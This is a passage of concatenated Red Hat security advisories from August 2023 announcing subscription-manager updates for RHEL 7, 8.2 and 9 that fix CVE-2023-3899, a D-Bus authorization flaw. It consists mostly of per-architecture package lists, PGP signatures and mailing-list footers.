subscription-manager-plugin-ostree-1.25.17.1-2.el8_1.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.25.17.1-2.el8_1.ppc64le.rpm

s390x:  
dnf-plugin-subscription-manager-1.25.17.1-2.el8_1.s390x.rpm  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
python3-subscription-manager-rhsm-1.25.17.1-2.el8_1.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
python3-syspurpose-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-plugin-container-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-plugin-ostree-1.25.17.1-2.el8_1.s390x.rpm  
subscription-manager-rhsm-certificates-1.25.17.1-2.el8_1.s390x.rpm

x86_64:  
dnf-plugin-subscription-manager-1.25.17.1-2.el8_1.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
python3-subscription-manager-rhsm-1.25.17.1-2.el8_1.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
python3-syspurpose-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-debuginfo-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-debugsource-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-plugin-container-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-plugin-ostree-1.25.17.1-2.el8_1.x86_64.rpm  
subscription-manager-rhsm-certificates-1.25.17.1-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhvAAoJENzjgjWX9erEN+EQAJo3v5YKy3qaOBfRRmAX6ZYn  
KJRlkjj2kFvolzA1rPyCQIyEQvjgeYi3KYED4Orik1zIKrlFGnRkAQqhmXHCtD+V  
Vg0HFNp8ZcU8zMs/DKUQ/Kg+PozOF68ZtitYZTycXWeCb9ntcAZ9H9IeSFy+Bt9f  
MZeblCi3etxpozUIOAn5Bb5NkxHyvl407lMUy5jp1O0PWDcHfp3VnBlKQ394n6ec  
Ijy9N+fvIqJVaDPjLEcvoDoda8Cw14ZO5EGTAeXvHtvYkFsGYr85d9UvKp4jvKqj  
X/FEJS8rAO0D0h8Bht3spKHB4pOarcDVJWmWKJVJmVYk59CPGfDLkrSrsRtCqUC+  
N5we8pT8Kg6nJe2eUtF0EbaksaZsOxMXgARmO7g2GhAOKn1dMbnzLQ7f9V/6UIsy  
mKBn4GoVXGLoUw7Ek+h7ca+IqyWdARsxEkzBv3RzeSLt0TsMdgYeaRBwGaKCe9r2  
pPoUmGPWSYYfodwSsmKZ8GJI8w7kQ7qCkf9aqNr7FdLXGvHGdueNk7WDc3gkWEgp  
jQSghH5cgxVneRtpvj9w4v42ibzmd+zMkhOucBgr53ArdixT8argK96MrJcFEGPt  
Cxw3LEyM+FQnRVwIiFzDcNPh7dglPDamvkiich86U+xKnx5zSQB758Rhr+0bUvXQ  
Fn9k/ZqhPUSiJcTKfoTE  
=qpjp  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4702-01

Red Hat Security Advisory 2023-4708-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4708-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4708  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
subscription-manager-1.29.33.1-2.el9_2.src.rpm

aarch64:  
libdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.aarch64.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.33.1-2.el9_2.aarch64.rpm  
python3-cloud-what-1.29.33.1-2.el9_2.aarch64.rpm  
python3-subscription-manager-rhsm-1.29.33.1-2.el9_2.aarch64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.33.1-2.el9_2.aarch64.rpm  
subscription-manager-1.29.33.1-2.el9_2.aarch64.rpm  
subscription-manager-debuginfo-1.29.33.1-2.el9_2.aarch64.rpm  
subscription-manager-debugsource-1.29.33.1-2.el9_2.aarch64.rpm  
subscription-manager-plugin-ostree-1.29.33.1-2.el9_2.aarch64.rpm

ppc64le:  
libdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.ppc64le.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.33.1-2.el9_2.ppc64le.rpm  
python3-cloud-what-1.29.33.1-2.el9_2.ppc64le.rpm  
python3-subscription-manager-rhsm-1.29.33.1-2.el9_2.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.33.1-2.el9_2.ppc64le.rpm  
subscription-manager-1.29.33.1-2.el9_2.ppc64le.rpm  
subscription-manager-debuginfo-1.29.33.1-2.el9_2.ppc64le.rpm  
subscription-manager-debugsource-1.29.33.1-2.el9_2.ppc64le.rpm  
subscription-manager-plugin-ostree-1.29.33.1-2.el9_2.ppc64le.rpm

s390x:  
libdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.s390x.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.33.1-2.el9_2.s390x.rpm  
python3-cloud-what-1.29.33.1-2.el9_2.s390x.rpm  
python3-subscription-manager-rhsm-1.29.33.1-2.el9_2.s390x.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.33.1-2.el9_2.s390x.rpm  
subscription-manager-1.29.33.1-2.el9_2.s390x.rpm  
subscription-manager-debuginfo-1.29.33.1-2.el9_2.s390x.rpm  
subscription-manager-debugsource-1.29.33.1-2.el9_2.s390x.rpm  
subscription-manager-plugin-ostree-1.29.33.1-2.el9_2.s390x.rpm

x86_64:  
libdnf-plugin-subscription-manager-1.29.33.1-2.el9_2.x86_64.rpm  
libdnf-plugin-subscription-manager-debuginfo-1.29.33.1-2.el9_2.x86_64.rpm  
python3-cloud-what-1.29.33.1-2.el9_2.x86_64.rpm  
python3-subscription-manager-rhsm-1.29.33.1-2.el9_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.29.33.1-2.el9_2.x86_64.rpm  
subscription-manager-1.29.33.1-2.el9_2.x86_64.rpm  
subscription-manager-debuginfo-1.29.33.1-2.el9_2.x86_64.rpm  
subscription-manager-debugsource-1.29.33.1-2.el9_2.x86_64.rpm  
subscription-manager-plugin-ostree-1.29.33.1-2.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhLAAoJENzjgjWX9erEZTIP/j8ltvT0uSgigA8rnjnbHeT8  
FcGbZfH26PDKk3mkJeBzRKj5i8YZE94m/B9QhfqWofLwLXbVVrkUfVm9Q+GY1Gt/  
aFSOao8igDJGM4PPVyUVvETy+s31gooBj7oyanoxGkgfHIoarLDXWQIIMqmkP5xm  
KKuOwIp+OQpzpx9MozrExzOdbHwuqcHljpBy2grzpJkLpcKkPt3Wz2y1x4aM+VyT  
CCTsQkcDnCOjShOw8qa5Ypwxj5uEt56osASdQXCHlcXMcyqK8FNNMcf6/7l0y5LN  
HonAHteo/wqMsmjKDPcWB1lKrlTNTDPD47JNMEp7ixRJyMgXCQmEgx3wb5e8jh4W  
FkB//kZNL5HFvjZt9dBFdJaMMCNAmWg/JtBeuiuxUFR8ucBGeWZJNIZEupJXDM8E  
A4fg1GZR4v/FbmoPyOlqRmNgTfsgN+m84mNpLbtKDu4FOe9MGgZHbHjgY/ZqFc+P  
QVUOxKeU8jYU6IGcp9egL1oSqW2bT4FDZFiTzeLnTWMErE1vBq/S1OF7QZiTdH8g  
3qk9a7emDkQ6Ph/XD64mSe6xhXqPgCNmMu8CEndyIV22eyaJM048ImlW9cWejDpF  
JlcsIGXmq6NX9U3es1n+F6vlIS/rkwzMms8JpYzPj/ynGCjDSYGn8G3HpmVDbw/p  
oDqEHfzTg/JJf/FWeckN  
=qzFd  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4708-01

Red Hat Security Advisory 2023-4701-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: subscription-manager security update  
Advisory ID:       RHSA-2023:4701-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4701  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
subscription-manager-1.24.52-2.el7_9.src.rpm

x86_64:  
python-syspurpose-1.24.52-2.el7_9.x86_64.rpm  
rhsm-gtk-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-gui-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-migration-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
subscription-manager-cockpit-1.24.52-2.el7_9.noarch.rpm

x86_64:  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
subscription-manager-1.24.52-2.el7_9.src.rpm

x86_64:  
python-syspurpose-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-migration-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
subscription-manager-cockpit-1.24.52-2.el7_9.noarch.rpm

x86_64:  
rhsm-gtk-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-gui-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
subscription-manager-1.24.52-2.el7_9.src.rpm

ppc64:  
python-syspurpose-1.24.52-2.el7_9.ppc64.rpm  
rhsm-gtk-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-gui-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-migration-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.ppc64.rpm

ppc64le:  
python-syspurpose-1.24.52-2.el7_9.ppc64le.rpm  
rhsm-gtk-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-gui-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-migration-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.ppc64le.rpm

s390x:  
python-syspurpose-1.24.52-2.el7_9.s390x.rpm  
rhsm-gtk-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-gui-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-migration-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.s390x.rpm

x86_64:  
python-syspurpose-1.24.52-2.el7_9.x86_64.rpm  
rhsm-gtk-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-gui-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-migration-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
subscription-manager-cockpit-1.24.52-2.el7_9.noarch.rpm

ppc64:  
subscription-manager-debuginfo-1.24.52-2.el7_9.ppc64.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.ppc64.rpm

ppc64le:  
subscription-manager-debuginfo-1.24.52-2.el7_9.ppc64le.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.ppc64le.rpm

s390x:  
subscription-manager-debuginfo-1.24.52-2.el7_9.s390x.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.s390x.rpm

x86_64:  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
subscription-manager-1.24.52-2.el7_9.src.rpm

x86_64:  
python-syspurpose-1.24.52-2.el7_9.x86_64.rpm  
rhsm-gtk-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-gui-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-initial-setup-addon-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-migration-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-container-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-rhsm-certificates-1.24.52-2.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

noarch:  
subscription-manager-cockpit-1.24.52-2.el7_9.noarch.rpm

x86_64:  
subscription-manager-debuginfo-1.24.52-2.el7_9.x86_64.rpm  
subscription-manager-plugin-ostree-1.24.52-2.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-3899  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5RhwAAoJENzjgjWX9erEPAoP/RrfFSWaeFVxlSKdbxhvddY8  
GeTz+sFCeC6Jovu/qEZAW+dojO96hPsguseXGx9TLsCZgAEgpq4+fQXylqQuoMpv  
Y/6AZ67xwzSQ46MflFQkEjMi9UI/SiY69egoPkvg6GX7GymlbU7UGg6cM+2iIWBP  
XG/SCiUIiEcZnB+FrW9su2V0RinL2HmLXixhk5FMBEeP5mgR3xXDqmL70FpTgViF  
u0G3q9QNGwij/uaLxI42q6l5ZjoKlg4FZmZOeZoXLAcQA+oly4QgEp3I3tm07qSj  
470R9ZLo1Yr4QReGZJO0TNDM4giwdWKxZ1VYnDT6kADKBz+gY2H5jO847yNrWJ4x  
2OIsccMA67+C4DvokRMHAKko9dZQZBt5+fHZkNhvbVWN6fldittPnHoIX+zHC+ep  
ninbsINr3YOX8baNfLmnqMuX3/4bVWQuZPRyIDsCCVyYzfjeTlnx5svePeIJD7vk  
1up5Rfbf8YUKkXuKhm7rZMTBOG/AQBvZT/BkVn94M+P9lGyLMk3CMMgSuHnNYFXP  
H0Sg89R6SkHtdm/bjqy9XLwE6ZWrzIM1C6MBlWLQXg5P6bK0NWhkTY0nDraf0BNC  
a/FynXlBckSuu1r2yGoP8Ubt7NBpMPgBEOrVr6QxSlZtqQXqO8/jzT7iLlGGmG5k  
AQNCEsbHF41uUgLGS3JQ  
=ZifM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4701-01

Red Hat Security Advisory 2023-4703-01 - The subscription-manager packages provide programs and libraries to allow users to manage subscriptions and yum repositories from the Red Hat entitlement platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: subscription-manager security update  
Advisory ID:       RHSA-2023:4703-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4703  
Issue date:        2023-08-22  
CVE Names:         CVE-2023-3899  
====================================================================  
1. Summary:

An update for subscription-manager is now available for Red Hat Enterprise  
Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - noarch, x86_64

3. Description:

The subscription-manager packages provide programs and libraries to allow  
users to manage subscriptions and yum repositories from the Red Hat  
entitlement platform.

Security Fix(es):

* subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus  
interface allows local users to modify configuration (CVE-2023-3899)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2225407 - CVE-2023-3899 subscription-manager: inadequate authorization of com.redhat.RHSM1 D-Bus interface allows local users to modify configuration

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
rhsm-gtk-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-initial-setup-addon-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-migration-1.26.22-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

ppc64le:  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
rhsm-gtk-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-initial-setup-addon-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-migration-1.26.22-2.el8_2.ppc64le.rpm

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
rhsm-gtk-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-initial-setup-addon-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-migration-1.26.22-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

x86_64:  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
rhsm-gtk-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-initial-setup-addon-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-migration-1.26.22-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
subscription-manager-1.26.22-2.el8_2.src.rpm

noarch:  
rhsm-icons-1.26.22-2.el8_2.noarch.rpm  
subscription-manager-cockpit-1.26.22-2.el8_2.noarch.rpm

x86_64:  
dnf-plugin-subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-syspurpose-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-plugin-ostree-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-rhsm-certificates-1.26.22-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
subscription-manager-1.26.22-2.el8_2.src.rpm

noarch:  
rhsm-icons-1.26.22-2.el8_2.noarch.rpm  
subscription-manager-cockpit-1.26.22-2.el8_2.noarch.rpm

ppc64le:  
dnf-plugin-subscription-manager-1.26.22-2.el8_2.ppc64le.rpm  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
python3-subscription-manager-rhsm-1.26.22-2.el8_2.ppc64le.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
python3-syspurpose-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-plugin-ostree-1.26.22-2.el8_2.ppc64le.rpm  
subscription-manager-rhsm-certificates-1.26.22-2.el8_2.ppc64le.rpm

x86_64:  
dnf-plugin-subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-syspurpose-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-plugin-ostree-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-rhsm-certificates-1.26.22-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
subscription-manager-1.26.22-2.el8_2.src.rpm

noarch:  
rhsm-icons-1.26.22-2.el8_2.noarch.rpm  
subscription-manager-cockpit-1.26.22-2.el8_2.noarch.rpm

x86_64:  
dnf-plugin-subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
dnf-plugin-subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-1.26.22-2.el8_2.x86_64.rpm  
python3-subscription-manager-rhsm-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
python3-syspurpose-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debuginfo-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-debugsource-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-plugin-ostree-1.26.22-2.el8_2.x86_64.rpm  
subscription-manager-rhsm-certificates-1.26.22-2.el8_2.x86_64.rpm

